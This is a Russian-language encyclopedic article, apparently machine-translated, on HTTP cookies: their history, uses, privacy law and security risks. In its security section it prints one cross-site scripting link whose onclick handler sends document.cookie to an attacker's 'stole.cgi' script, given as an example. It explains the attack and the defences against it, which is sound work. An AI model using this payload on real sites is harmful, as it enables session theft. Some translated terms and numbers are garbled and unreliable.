in ,

Интернет-куки: что это такое? Определение, происхождение, типы и конфиденциальность

Какова роль файла cookie, что это такое и какие существуют типы файлов cookie? 🍪

Интернет-куки: что это такое? Определение, происхождение, типы и конфиденциальность
Интернет-куки: что это такое? Определение, происхождение, типы и конфиденциальность

Un файл cookie или веб-файл cookie (или печенье, сокращенно свидетель в Квебеке) определяется протоколом связи HTTP как последовательность информации, отправляемой HTTP-сервером HTTP-клиенту, которую последний возвращает каждый раз, когда тот же HTTP-сервер запрашивается при определенных условиях.

Файл cookie является эквивалентом небольшой текстовый файл, хранящийся на терминале пользователя Интернета. Существующие более 20 лет, они позволяют разработчикам веб-сайтов хранить пользовательские данные, чтобы облегчить их навигацию и использовать определенные функции. Файлы cookie всегда были более или менее противоречивыми, поскольку они содержат остаточную личную информацию, которая потенциально может быть использована третьими лицами.

Веб-сервер отправляет его в виде заголовка HTTP веб-браузеру, который возвращает его без изменений каждый раз, когда он обращается к серверу. Файл cookie можно использовать для аутентификация, сеанс (государственное содержание), а для хранить конкретную информацию о пользователе, такие как настройки сайта или содержимое электронной корзины. Термин «куки» происходит от волшебное печенье, хорошо известная концепция вычислений UNIX, которая вдохновила идею и название файлов cookie браузера. Существует несколько альтернатив файлам cookie, каждая из которых имеет свои особенности использования, преимущества и недостатки.

Будучи простыми текстовыми файлами, файлы cookie не являются исполняемыми. Они не ни шпионское ПО, ни вирусы, хотя файлы cookie с некоторых сайтов обнаруживаются многими антивирусными программами, поскольку они позволяют отслеживать пользователей при посещении ими нескольких сайтов. 

Большинство современных браузеров позволяют пользователям решить, принимать или отклонять файлы cookie. Пользователи также могут выбрать, как долго файлы cookie хранятся. Однако полный отказ от файлов cookie делает некоторые сайты непригодными для использования. Например, хранить тележки для покупок или сайты, требующие входа в систему с использованием учетных данных (имя пользователя и пароль).

содержание

Historique

Ванны печенье происходит от английского термина волшебное печенье, который представляет собой пакет данных, который программа получает и возвращает без изменений. Файлы cookie уже использовались в ИТ, когда Лу Монтулли возникла идея использовать их в веб-коммуникациях в июне 1994. В то время он работал в компании Netscape Communications, которая разработала для клиента приложение для электронной коммерции. Файлы cookie дали решение проблемы надежности реализации виртуальной корзины покупок в магазине.

В том же году Джон Джаннандреа и Лу Монтулли написали первую спецификацию файлов cookie для Netscape. Бета-версия 0.9 Mosaic Netscape, выпущенная 13 октября 1994 г., интегрирована технология cookie (см. пост). Первое (не экспериментальное) использование файлов cookie заключалось в том, чтобы определить, посещали ли посетители веб-сайта Netscape этот сайт ранее. Монтулли подал заявку на патент на технологию файлов cookie в 1995 году, и был выдан патент США 5774670 XNUMX XNUMX. выдано в 1998 г..

После внедрения в бета-версии Netscape 0.9 в 1994 году файлы cookie были интегрированы в Internet Explorer 2, выпущенный в октябре 1995 года.

Внедрение файлов cookie еще не было широко известно общественности. В частности, файлы cookie были приняты по умолчанию в настройках браузера, и пользователи не были проинформированы об их наличии. Некоторые люди знали о существовании файлов cookie примерно в первом квартале 1995 года, но широкая общественность узнала об их существовании только после того, как 12 февраля 1996 года в Financial Times была опубликована статья. В том же году файлы cookie привлекли большое внимание средств массовой информации. из-за возможного вторжения в частную жизнь. Тема файлов cookie обсуждалась на двух консультациях Американской федеральной торговой комиссии в 1996 и 1997 годах.

Разработка официальной спецификации файлов cookie уже началась. Первые обсуждения официальной спецификации состоялись в апреле 1995 года в списке рассылки www-talk. Была сформирована специальная рабочая группа IETF. Два альтернативных предложения по введению состояния в HTTP-транзакции были предложены Брайаном Белендорфом и Дэвидом Кристолом соответственно, но группа, возглавляемая самим Кристолом, решила использовать спецификацию Netscape в качестве отправной точки. В феврале 1996 года рабочая группа определила, что сторонние файлы cookie представляют серьезную угрозу конфиденциальности. Спецификация, подготовленная группой, была в конечном итоге опубликована как RFC 2109.

С конца 2014 года мы видим баннер о файлах cookie на многих сайтах. Существует как минимум одно расширение для браузера, позволяющее баннер не отображается.

Типы файлов cookie и их использование

Управление сеансом

Файлы cookie могут использоваться для хранения пользовательских данных во время навигации, а также во время нескольких посещений. Файлы cookie были введены для предоставления средств реализации электронных корзин покупок, виртуального устройства, в котором пользователь может накапливать товары, которые он хочет купить, во время просмотра сайта.

В наши дни такие приложения, как корзины для покупок, вместо этого хранят список товаров в базе данных на сервере, что предпочтительнее; чем сохранять их в самом файле cookie. Веб-сервер отправляет файл cookie, содержащий уникальный идентификатор сеанса. Затем веб-браузер возвращает этот идентификатор сеанса при каждом последующем запросе, и элементы в корзине сохраняются и связываются с этим же уникальным идентификатором сеанса.

Частое использование файлов cookie полезно для входа на сайт с использованием учетных данных. Короче говоря, веб-сервер сначала отправляет файл cookie, содержащий уникальный идентификатор сеанса. Затем пользователи предоставляют свои учетные данные (обычно это имя пользователя и пароль). Затем веб-приложение аутентифицирует сеанс и позволяет пользователю получить доступ к службе.

воплощение

Файлы cookie могут использоваться для запоминания информации о пользователе сайта, чтобы в будущем показывать ему соответствующий контент. Например, веб-сервер может отправить файл cookie, содержащий последнее имя пользователя, которое использовалось для входа на этот веб-сайт, чтобы это имя пользователя можно было предварительно заполнить при будущих посещениях.

Многие веб-сайты используют файлы cookie для персонализации на основе предпочтений пользователя. Пользователи выбирают свои предпочтения в форме и отправляют их на сервер. Сервер кодирует настройки в файле cookie и отправляет его обратно в браузер. Впоследствии каждый раз, когда пользователь заходит на страницу этого сайта, браузер возвращает файл cookie и, следовательно, список предпочтений; затем сервер может настроить страницу в соответствии с предпочтениями пользователя. Например, веб-сайт Википедия позволяет своим пользователям выбирать скин сайта, который они предпочитают. Поисковая система Google позволяет своим пользователям (даже если они не зарегистрированы) выбирать количество результатов, которые они хотят видеть на каждой странице результатов.

Отслеживание

Отслеживающие файлы cookie используются для отслеживания привычек пользователей Интернета. Это также можно сделать частично, используя IP-адрес компьютера, отправляющего запрос на страницу, или используя HTTP-заголовок «referrer», который клиент отправляет с каждым запросом, но файлы cookie обеспечивают большую точность. Это можно сделать, как в следующем примере:

  1. Если пользователь вызывает страницу на сайте, а запрос не содержит cookie, сервер считает, что это первая страница, посещенная пользователем. Затем сервер создает случайную строку и отправляет ее в браузер вместе с запрошенной страницей.
  2. С этого момента cookie будет автоматически отправляться браузером при каждом вызове новой страницы сайта. Сервер отправит страницу как обычно, но также зарегистрирует URL-адрес вызываемой страницы, дату, время запроса и файл cookie в файле журнала.

Просматривая файл журнала, можно увидеть, какие страницы посетил пользователь и в каком порядке. Например, если файл содержит несколько запросов, сделанных с использованием файла cookie id=abc, это может установить, что все эти запросы исходят от одного и того же пользователя. Запрошенный URL-адрес, дата и время, связанные с запросами, позволяют отслеживать просмотр пользователя.

Сторонние файлы cookie и веб-маяки, описанные ниже, дополнительно позволяют осуществлять отслеживание на разных сайтах. Отслеживание отдельных сайтов обычно используется в статистических целях. Напротив, отслеживание на разных сайтах с использованием сторонних файлов cookie обычно используется рекламными компаниями для создания анонимных профилей пользователей (которые затем используются для определения того, какие рекламные объявления следует показывать пользователю, а также для отправки ему электронных писем, соответствующих этим рекламным объявлениям — СПАМ). ).

Отслеживающие файлы cookie представляют собой риск вторжения в частную жизнь пользователя, но их можно легко удалить. В большинстве современных браузеров предусмотрена возможность автоматического удаления постоянных файлов cookie при закрытии приложения.

Сторонние файлы cookie

Изображения и другие объекты, содержащиеся на веб-странице, могут находиться на серверах, отличных от того, на котором размещена страница. Для отображения страницы браузер загружает все эти объекты. Большинство веб-сайтов содержат информацию из разных источников. Например, если вы введете www.example.com в браузере, на части страницы часто будут объекты или рекламные объявления, поступающие из разных источников, т. е. из другого домена, чем www.example.com. «Основные» файлы cookie — это файлы cookie, которые устанавливаются доменом, указанным в адресной строке браузера. Сторонние файлы cookie устанавливаются одним из объектов страницы, который поступает из другого домена.

По умолчанию такие браузеры, как Mozilla Firefox, Microsoft Internet Explorer и Opera, принимают сторонние файлы cookie, но пользователи могут изменить настройки в параметрах браузера, чтобы заблокировать их. Сторонние файлы cookie, обеспечивающие работу веб-функций, не представляют угрозы безопасности, однако они также используются для отслеживания пользователей. с сайта на сайт.

Такие инструменты, как Ghostery, доступные для всех браузеров, включая Google Chrome, могут блокировать обмен данными между третьими сторонами.

Реализация

Возможное взаимодействие между веб-браузером и сервером, на котором размещена веб-страница. Сервер отправляет cookie в браузер, а браузер отправляет его обратно при вызове другой страницы.
Возможное взаимодействие между веб-браузером и сервером, на котором размещена веб-страница. Сервер отправляет cookie в браузер, а браузер отправляет его обратно при вызове другой страницы.

Файлы cookie — это небольшие фрагменты данных, отправляемые веб-сервером в браузер. Браузер возвращает их на сервер без изменений, вводя состояние (память о прошлых событиях) в HTTP-транзакцию без сохранения состояния. Без файлов cookie каждый поиск веб-страницы или компонента веб-страницы является изолированным событием, независимым от других запросов, сделанных на том же сайте. Помимо того, что файлы cookie могут быть установлены веб-сервером, они также могут быть установлены языками сценариев, такими как JavaScript, если они поддерживаются и авторизуются браузером.

Официальная спецификация файлов cookie предполагает, что браузеры должны иметь возможность сохранять и повторно отправлять минимальное количество файлов cookie. В частности, браузер должен иметь возможность хранить не менее 300 файлов cookie по четыре килобайта каждый и не менее 20 файлов cookie для одного сервера или домена.

Согласно пункту 3.1. RFC 2965, имена файлов cookie нечувствительны к регистру.

Файл cookie может указывать дату истечения срока его действия, и в этом случае файл cookie будет удален в эту дату. Если в файле cookie не указана дата истечения срока действия, файл cookie удаляется, как только пользователь покидает свой браузер. Следовательно, указание даты истечения срока действия — это способ сохранить файл cookie в течение нескольких сеансов. По этой причине файлы cookie с датой истечения срока действия называются стойкий. Пример применения: сайт розничной торговли может использовать постоянные файлы cookie для записи товаров, которые пользователи поместили в свою корзину (на самом деле файл cookie может относиться к записи, сохраненной в базе данных на сайте продажи, а не на вашем компьютере) . Благодаря этому, если пользователи закроют свой браузер, не совершив покупку, и вернутся к нему позже, они смогут снова найти товары в корзине. Если бы эти файлы cookie не давали срок действия, они истекли бы при закрытии браузера, и информация о содержимом корзины была бы потеряна.

Файлы cookie могут быть ограничены по объему определенным доменом, субдоменом или путем на сервере, на котором они были созданы.

Передача веб-страниц осуществляется с использованием протокола передачи гипертекста (HTTP). Игнорируя файлы cookie, браузеры вызывают страницу с веб-серверов, обычно отправляя им короткий текст под названием HTTP-запрос. Например, чтобы получить доступ к странице www.example.org/index.html, браузеры подключаются к серверу www.example.org и отправляют запрос, который выглядит следующим образом:

GET /index.html HTTP/1.1Host: www.example.org
навигаторсервер

Сервер отвечает, отправляя запрошенную страницу, которой предшествует аналогичный текст, и все это называется HTTP-ответ. Этот пакет может содержать строки, указывающие браузеру сохранять файлы cookie:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: имя=значение
(HTML-страница)
навигаторсервер

Сервер отправляет строку Set-Cookie только в том случае, если сервер хочет, чтобы браузер сохранил файл cookie. Set-Cookie — это запрос к браузеру на сохранение строки name=value и ее возврат во всех будущих запросах к серверу. Если браузер поддерживает файлы cookie и файлы cookie включены в настройках браузера, файл cookie будет включен во все последующие запросы, направляемые на тот же сервер. Например, браузер вызывает страницу www.example.org/news.html, отправив следующий запрос на сервер www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
навигаторсервер

Это запрос другой страницы с того же сервера, и он отличается от первого выше, поскольку содержит строку, которую сервер ранее отправил в браузер. Благодаря этому сервер знает, что этот запрос связан с предыдущим. Сервер отвечает отправкой вызываемой страницы, а также добавлением к ней других файлов cookie.

Значение cookie может быть изменено сервером путем отправки новой строки Set-Cookie: name=new_value в ответ на вызываемую страницу. Затем браузер заменяет старое значение новым.

Строка Set-Cookie обычно создается программой CGI или другим языком сценариев, а не сервером HTTP. HTTP-сервер (пример: Apache) будет передавать в браузер только результат работы программы (документ, которому предшествует заголовок, содержащий файлы cookie).

Файлы cookie также могут быть установлены с помощью JavaScript или других подобных языков, работающих в браузере, то есть на стороне клиента, а не на стороне сервера. В JavaScript для этой цели используется объект document.cookie. Например, инструкция document.cookie = "temperature=20" создает файл cookie с именем "temperature" и значением 20.

Пример ответа HTTP от google.com, который устанавливает файл cookie с атрибутами.
Пример ответа HTTP от google.com, который устанавливает файл cookie с атрибутами.

В дополнение к паре имя/значение файл cookie также может содержать дату истечения срока действия, путь, доменное имя и предполагаемый тип соединения, то есть обычное или зашифрованное. RFC 2965 также определяет, что файлы cookie должны иметь обязательный номер версии, но обычно он не указывается. Эти части данных следуют за парой name=new_value и разделяются точкой с запятой. Например, сервер может создать файл cookie, отправив строку Set-Cookie: name=new_value; истекает = дата; путь=/; домен=.example.org.

Срок действия файлов cookie истекает, и они не отправляются браузером на сервер в следующих случаях:

  • Когда браузер закрыт, если файл cookie не является постоянным.
  • Когда истек срок действия файла cookie.
  • Когда дата истечения срока действия cookie изменяется (сервером или сценарием) на дату в прошлом.
  • Когда браузер удаляет куки по запросу пользователя.

Третья ситуация позволяет серверам или скриптам явно удалять куки. Обратите внимание, что с помощью веб-браузера Google Chrome можно узнать дату истечения срока действия определенного файла cookie, обратившись к настройкам содержимого. Файл cookie, сохраненный на компьютере, вполне может оставаться там в течение нескольких десятилетий, если не будет предпринята процедура его удаления.

Стереотипы

С момента их появления в Интернете в Интернете и в средствах массовой информации распространилось множество идей о файлах cookie. В 1998 году CIAC, группа мониторинга компьютерных инцидентов Министерства энергетики США, определила, что уязвимости в безопасности файлов cookie «практически отсутствуют», и объяснила, что «информация о происхождении ваших посещений и сведения о посещенных вами веб-страницах уже существуют в файлах журналов веб-серверов». В 2005 году компания Jupiter Research опубликовала результаты исследования, в котором значительный процент респондентов рассматривал следующие утверждения:

  • Куки похожи вирус, они заражают жесткие диски пользователей.
  • Файлы cookie генерируют сообщения.
  • Файлы cookie используются для отправки спам.
  • Файлы cookie используются только для рекламы.

Файлы cookie не могут стирать или считывать информацию с компьютера пользователя. Однако файлы cookie позволяют обнаруживать веб-страницы, посещаемые пользователем на данном сайте или наборе сайтов. Эта информация может быть собрана в профиле пользователя, который может быть использован или перепродан третьим лицам, что может создать серьезные проблемы с конфиденциальностью. Некоторые профили являются анонимными в том смысле, что они не содержат личной информации, но даже такие профили могут быть сомнительными.

Согласно тому же исследованию, большой процент интернет-пользователей не знает, как удалять файлы cookie. Одна из причин, по которой люди не доверяют файлам cookie, заключается в том, что некоторые сайты злоупотребляют идентифицирующим личность аспектом файлов cookie и передают эту информацию другим источникам. Большой процент целевой рекламы и незапрашиваемой электронной почты, считающейся спамом, поступает из информации, полученной из отслеживающих файлов cookie.

Настройки браузера

Большинство браузеров поддерживают файлы cookie и позволяют пользователю отключать их. Наиболее распространенные варианты:

  • Полностью включить или отключить файлы cookie, чтобы они постоянно принимались или блокировались.
  • Разрешить пользователю видеть активные файлы cookie на данной странице, введя javascript: alert(document.cookie) в адресной строке браузера. Некоторые браузеры включают диспетчер файлов cookie для пользователя, который может просматривать и выборочно удалять файлы cookie, хранящиеся в данный момент в браузере.

Большинство браузеров также позволяют полностью удалить личные данные, включая файлы cookie. Также существуют дополнительные модули для управления разрешениями на использование файлов cookie.

Конфиденциальность и сторонние файлы cookie

В этом вымышленном примере рекламная компания разместила баннеры на двух сайтах. Размещая баннеры на своих серверах и используя сторонние файлы cookie, рекламная компания может отслеживать навигацию пользователя по этим двум сайтам.

Файлы cookie имеют важное значение для конфиденциальности и анонимности веб-пользователей. Хотя файлы cookie отправляются обратно только на сервер, который их установил, или на сервер, принадлежащий к тому же интернет-домену, веб-страница может содержать изображения или другие компоненты, хранящиеся на серверах, принадлежащих другим доменам. Файлы cookie, которые устанавливаются во время восстановления этих внешних компонентов, называются сторонние файлы cookie. Сюда входят файлы cookie из нежелательных всплывающих окон.

Рекламные компании используют сторонние файлы cookie для отслеживания пользователей на различных сайтах, которые они посещают. В частности, рекламная компания может отслеживать пользователя по всем страницам, где она разместила рекламные изображения или пиксель отслеживания. Знание страниц, посещаемых пользователем, позволяет рекламной компании ориентироваться на рекламные предпочтения пользователя.

Некоторые считают возможность создания профиля пользователя вторжением в частную жизнь, особенно когда отслеживание осуществляется в разных доменах с использованием сторонних файлов cookie. По этой причине в некоторых странах действует законодательство о файлах cookie.

Правительство Соединенных Штатов ввело строгие правила размещения файлов cookie в 2000 году, после того как выяснилось, что Управление по политике в отношении наркотиков Белого дома использует файлы cookie для отслеживания компьютеров пользователей, просматривающих онлайн-рекламу наркотиков. В 2002 году борец за конфиденциальность Даниэль Брандт обнаружил, что ЦРУ оставляет постоянные файлы cookie на компьютерах, которые посещали его веб-сайты. Узнав об этом нарушении, ЦРУ заявило, что эти файлы cookie не были отправлены намеренно, и прекратило их установку. 25 декабря 2005 г. Брандт обнаружил, что Агентство национальной безопасности (АНБ) оставило два постоянных файла cookie на компьютерах посетителей из-за обновления программного обеспечения. Получив уведомление, АНБ немедленно отключило файлы cookie.

В Соединенном Королевстве Закон о файлах cookie «, вступивший в силу 25 мая 2012 г., обязывает сайты заявлять о своих намерениях, тем самым позволяя пользователям выбирать, хотят ли они оставлять следы своего пребывания в Интернете или нет. Таким образом, они могут быть защищены от таргетинга рекламы. Однако, в соответствии с The Guardian. , согласие пользователей Интернета не обязательно должно быть явным; были внесены изменения в условия согласия пользователя, что делает его таким образом подразумевается.

Директива 2002/58 о конфиденциальности

Директива 202/58 о конфиденциальности и электронных коммуникациях содержит правила использования файлов cookie. В частности, пункт 5 статьи 3 этой директивы требует, чтобы хранение данных (например, файлов cookie) на компьютере пользователя могло осуществляться только в том случае, если:

  • пользователь информируется о том, как используются данные;
  • пользователю предоставляется возможность отказаться от этой операции хранения. Однако в этой статье также говорится, что хранение данных по техническим причинам не подпадает под действие этого закона.

Директива, которая должна была быть введена в действие с октября 2003 г., однако, согласно отчету от декабря 2004 г., применялась на практике лишь очень несовершенно, в котором также указывалось, что некоторые государства-члены (Словакия, Латвия, Греция, Бельгия и Люксембург) еще не приняли директивы во внутреннее законодательство.

По мнению G29 в 2010 году, эта директива, которая, в частности, обуславливает использование файлов cookie в целях поведенческой рекламы при явном согласии пользователя Интернета, применяется очень плохо. На самом деле, большинство сайтов делают это не в соответствии с директивой, ограничиваясь простым «баннером», информирующим об использовании «куки», не предоставляя информацию об использовании, не проводя различий между «техническими» куки. «отслеживающие» файлы cookie, а также не предлагать реальный выбор пользователю, желающему поддерживать технические файлы cookie (например, файлы cookie для управления корзиной покупок), и отказываться от «отслеживающих» файлов cookie. Фактически, многие сайты не работают должным образом, если файлы cookie запрещены, что не соответствует директиве 2002/58 или директиве 95/46 (Защита персональных данных).

Директива 2009 / 136 / CE

Этот материал был обновлен Директивой 2009/136/ЕС от 25 ноября 2009 г., в которой говорится, что «хранение информации или получение доступа к уже сохраненной информации в терминальном оборудовании абонента или пользователя разрешено только при условии, что подписчик или пользователь дал свое согласие после получения, в соответствии с Директивой 95/46/EC, четкой и полной информации между другими о целях обработки». Таким образом, новая директива усиливает обязательства перед размещением файлов cookie на компьютере пользователя Интернета.

Однако в предварительных обсуждениях директивы европейский законодатель уточняет: «В тех случаях, когда это технически возможно и эффективно, в соответствии с соответствующими положениями Директивы 95/46/ЕС согласие пользователя в отношении обработки может быть выражено посредством использование соответствующих настроек браузера или другого приложения». Но на самом деле ни один браузер на сегодняшний день не позволяет отделить основные технические файлы cookie от необязательных, которые должны быть оставлены на выбор пользователя.

Эта новая директива была перенесена бельгийскими депутатами в июле 2012 года. Исследование 2014 года показывает, что даже депутаты с трудом применяют ограничения директивы.

P3P

Спецификация P3P включает в себя возможность для сервера устанавливать политику конфиденциальности, которая определяет, какую информацию он собирает и с какой целью. Эти политики включают (но не ограничиваются) использование информации, собранной с помощью файлов cookie. Согласно определениям P3P, браузер может принимать или отклонять файлы cookie, сравнивая политику конфиденциальности с предпочтениями пользователя или запрашивая у пользователя заявление о конфиденциальности политики конфиденциальности, объявленное сервером.

Многие браузеры, в том числе Apple Safari и Microsoft Internet Explorer версий 6 и 7, поддерживают P3P, что позволяет браузеру определять, следует ли принимать стороннее хранилище файлов cookie. Браузер Opera позволяет пользователям отказаться от сторонних файлов cookie и создать глобальный и специальный профиль безопасности для интернет-доменов. Mozilla Firefox версии 2 отказался от поддержки P3P, но восстановил ее в версии 3.

Сторонние файлы cookie могут быть заблокированы большинством браузеров, чтобы повысить конфиденциальность и уменьшить отслеживание рекламы, не оказывая негативного влияния на работу пользователя в Интернете. Многие рекламные агентства предлагают вариант отказаться к целевой рекламе, установив в браузере общий файл cookie, который деактивирует этот таргетинг, но такое решение практически неэффективно, когда оно соблюдается, поскольку этот общий файл cookie стирается, как только пользователь удаляет эти файлы cookie, что отменяет выбор вне решение.

Недостатки файлов cookie

Помимо проблем с конфиденциальностью, файлы cookie также имеют некоторые технические недостатки. В частности, они не всегда точно идентифицируют пользователей, могут замедлять работу сайта при большом количестве, могут использоваться для атак на безопасность и конфликтуют с репрезентативным состоянием передачи, архитектурным стилем программного обеспечения.

Неточная идентификация

Если на компьютере используется более одного браузера, в каждом из них всегда есть отдельный блок хранения файлов cookie. Таким образом, файлы cookie идентифицируют не человека, а комбинацию учетной записи пользователя, компьютера и веб-браузера. Таким образом, любой может использовать эти учетные записи, компьютеры или браузеры, на которых установлено множество файлов cookie. Точно так же файлы cookie не делают различия между несколькими пользователями, которые используют одну и ту же учетную запись пользователя, компьютер и браузер, например, в «интернет-кафе» или любом другом месте, предоставляющем свободный доступ к компьютерным ресурсам.

Но на практике это утверждение в большинстве случаев оказывается ложным, поскольку сегодня «персональный» компьютер (или, что еще хуже, смартфон или планшет) используется в основном одним человеком, что равносильно нацеливанию на конкретного человека и благодаря объему собранной информации достичь персонализированного таргетинга, даже если человек не «именно» идентифицирован.

Файл cookie может быть украден другим компьютером в сети.

При нормальной работе файлы cookie отправляются обратно между сервером (или группой серверов в одном домене) и браузером компьютера пользователя. Поскольку файлы cookie могут содержать конфиденциальную информацию (имя пользователя, пароль, используемый для аутентификации и т. д.), их значения не должны быть доступны другим компьютерам. Кража файлов cookie — это акт перехвата файлов cookie неуполномоченной третьей стороной.

Файлы cookie могут быть украдены с помощью анализатора пакетов в ходе атаки, называемой перехватом сеанса. Трафик в сети может быть перехвачен и прочитан компьютерами, отличными от отправляющих и принимающих (особенно в незашифрованном общедоступном пространстве Wi-Fi). Этот трафик включает в себя файлы cookie, отправленные по сеансам с использованием простого протокола HTTP. Таким образом, когда сетевой трафик не зашифрован, злоумышленники могут читать сообщения других пользователей в сети с помощью «анализаторов пакетов».

Эту проблему можно решить, зашифровав соединение между компьютером пользователя и сервером с помощью протокола HTTPS. Сервер может указать безопасный флаг при установке файла cookie; браузер будет отправлять его только по защищенной линии, такой как SSL-соединение.

Однако многие сайты, хотя и используют зашифрованную связь HTTPS для аутентификации пользователя (т. Е. Страница входа), позже отправляют файлы cookie сеанса и другие данные как обычно через незашифрованные HTTP-соединения из соображений эффективности. Таким образом, злоумышленники могут перехватывать файлы cookie других пользователей и выдавать себя за них на соответствующих сайтах или использовать их в атаках с использованием файлов cookie.

Сценарий на сайте: файл cookie, которым следует обмениваться только между сервером и клиентом, отправляется третьей стороне.

Еще один способ украсть файлы cookie — создать сценарии для сайтов и заставить сам браузер отправлять файлы cookie на вредоносные серверы, которые никогда их не получают. Современные браузеры позволяют выполнять нужные части кода с сервера. Если доступ к файлам cookie осуществляется во время выполнения, их значения могут быть переданы в той или иной форме серверам, которые не должны получать к ним доступ. Шифрование файлов cookie перед их отправкой по сети не помогает предотвратить атаку.

Этот тип внутреннего сценария обычно используется злоумышленниками на сайтах, которые позволяют пользователям публиковать HTML-контент. Интегрируя часть совместимого кода во вклад HTML, злоумышленник может получать файлы cookie от других пользователей. Информация об этих файлах cookie может быть использована путем подключения к тому же сайту с использованием украденных файлов cookie, что позволит распознать пользователя, чьи файлы cookie были украдены.

Одним из способов предотвращения таких атак является использование флага HttpOnly; это опция, введенная начиная с версии 6 Internet Explorer в PHP, начиная с версии 5.2.0, которая предназначена для того, чтобы сделать cookie недоступным для клиента, близкого к скрипту. Тем не менее, веб-разработчики должны учитывать это при разработке своего сайта, чтобы они были невосприимчивы к сценариям на сайте.

Еще одна используемая угроза безопасности — фабрикация запросов на сайте.

Официальная техническая спецификация разрешает отправку файлов cookie только на серверы в том домене, из которого они были созданы. Однако значение файлов cookie может быть отправлено на другие серверы с использованием средств, отличных от заголовков файлов cookie.

В частности, языкам сценариев, таким как JavaScript, обычно разрешен доступ к значениям файлов cookie, и они способны отправлять произвольные значения на любой сервер в Интернете. Эта возможность сценариев используется на веб-сайтах, позволяющих пользователям публиковать HTML-контент для просмотра другими пользователями.

Например, злоумышленник, работающий в домене example.com, может опубликовать комментарий, содержащий следующую ссылку, указывающую на популярный блог, который он иначе не контролирует:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Когда другой пользователь нажимает на эту ссылку, браузер выполняет часть кода атрибута onclick, поэтому он заменяет строку document.cookie списком пользовательских файлов cookie, которые активны для этой страницы. Таким образом, этот список файлов cookie отправляется на сервер example.com, и поэтому злоумышленник может собирать файлы cookie этого пользователя.

Этот тип атаки трудно обнаружить на стороне пользователя, потому что сценарий исходит из того же домена, который установил файл cookie, и операция по отправке значений выглядит авторизованной этим доменом. Считается, что администраторы таких сайтов обязаны установить ограничения, предотвращающие публикацию вредоносного кода.

Файлы cookie не видны напрямую клиентским программам, таким как JavaScript, если они были отправлены с флагом HttpOnly. С точки зрения сервера разница только в том, что в строке заголовка Set-Cookie добавлено новое поле, содержащее строку HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Когда браузер получает такой файл cookie, предполагается, что он обычно использует его в следующем обмене HTTP, но не делает его видимым для сценариев, выполняемых на стороне клиента. Флаг HttpOnly не является частью какой-либо официальной технической спецификации и реализован не во всех браузерах. Обратите внимание, что в настоящее время нет способа предотвратить чтение и запись файлов cookie сеанса с помощью метода XMLHTTPRequest.

Модификация содержимого: злоумышленник отправляет на сервер недопустимый файл cookie, возможно, созданный из действительного файла cookie, отправленного сервером.

Как только файлы cookie должны быть сохранены и возвращены на сервер без изменений, злоумышленник может изменить значение файлов cookie, прежде чем они будут отправлены обратно на сервер. Например, если файл cookie содержит общую стоимость, которую пользователь должен заплатить за товары, помещенные в корзину магазина, изменение этого значения подвергает сервер риску взимать с злоумышленника меньшую сумму, чем начальная цена. Процесс изменения значения файлов cookie называется отравление печеньем и может использоваться после кражи файлов cookie, чтобы сделать атаку постоянной.

В методе переопределения файла cookie злоумышленник использует сбой браузера, чтобы отправить на сервер недопустимый файл cookie.

Однако большинство веб-сайтов хранят только идентификатор сеанса — случайно сгенерированный уникальный номер, используемый для идентификации пользователя сеанса — в самом файле cookie, тогда как вся остальная информация хранится на сервере. В данном случае эта проблема во многом решена.

Ожидается, что каждый сайт будет иметь свои собственные файлы cookie, поэтому один сайт не должен иметь возможности изменять или создавать файлы cookie, связанные с другим сайтом. Недостаток безопасности веб-браузера может позволить вредоносным сайтам нарушить это правило. Эксплуатация такого недостатка обычно называется межсайтовая кулинария. Целью таких атак может быть кража идентификатора сеанса.

Пользователям следует использовать последние версии веб-браузеров, в которых эти уязвимости практически устранены.

Конфликтное состояние между клиентом и сервером

Использование файлов cookie может вызвать противоречие между состоянием клиента и состоянием, хранящимся в файле cookie. Если пользователь получает файл cookie и нажимает кнопку «Назад» в браузере, состояние браузера, как правило, не такое, как до этого получения. Например, если корзина интернет-магазина создана с использованием файлов cookie, содержимое корзины не может измениться, когда пользователь возвращается к истории браузера: если пользователь нажимает кнопку добавления статьи в свою корзину и нажимает кнопку «Вернуть ", статья остается в этой. Это может быть не намерение пользователя, который наверняка хочет отменить добавление статьи. Это может привести к ненадежности, путанице и ошибкам. Поэтому веб-разработчики должны знать об этой проблеме и принимать меры для решения подобных ситуаций.

Постоянные файлы cookie подверглись критике со стороны экспертов по безопасности конфиденциальности за то, что срок их действия не истекает достаточно быстро, что позволяет веб-сайтам отслеживать пользователей и со временем создавать их профиль. Этот аспект файлов cookie также является частью проблемы перехвата сеанса, поскольку украденный постоянный файл cookie может использоваться для выдачи себя за пользователя в течение значительного периода времени.

Читайте также: ГАФАМ: кто они? Почему они (иногда) такие страшные?

Альтернативы файлам cookie

Некоторые операции, которые могут быть выполнены с использованием файлов cookie, также могут выполняться с использованием других механизмов, которые обходят файлы cookie или воссоздают удаленные файлы cookie, что создает проблемы с конфиденциальностью таким же образом (или иногда хуже, потому что тогда они невидимы), чем файлы cookie.

IP-адрес

Пользователей можно отследить по IP-адресу компьютера, вызывающего страницу. Этот метод был доступен с момента появления Всемирной паутины, когда страницы загружаются, сервер запрашивает IP-адрес компьютера, на котором запущен браузер или прокси-сервер, если они не используются. Сервер может отслеживать эту информацию независимо от того, используются ли файлы cookie. Однако эти адреса, как правило, менее надежны для идентификации пользователя, чем файлы cookie, поскольку компьютеры и прокси-серверы могут совместно использоваться несколькими пользователями, и один и тот же компьютер может получать разные IP-адреса в каждом рабочем сеансе (как это часто бывает при телефонных соединениях). .

Отслеживание по IP-адресам может быть надежным в некоторых ситуациях, таких как широкополосные соединения, которые сохраняют один и тот же IP-адрес в течение длительного времени, пока питание включено.

Некоторые системы, такие как Tor, предназначены для обеспечения анонимности в Интернете и делают отслеживание по IP-адресу невозможным или нецелесообразным.

URL

Более точный метод основан на внедрении информации в URL-адреса. Часть URL-адреса, состоящая из строки запроса, — это один из методов, который обычно используется для этой цели, но можно использовать и другие части. Как серверлет Java, так и механизмы сеанса PHP используют этот метод, если файлы cookie не включены.

Этот метод включает в себя добавление веб-сервером строковых запросов к ссылкам веб-страницы, которая несет их, когда они отправляются в браузер. Когда пользователь переходит по ссылке, браузер возвращает прикрепленную строку запроса на сервер.

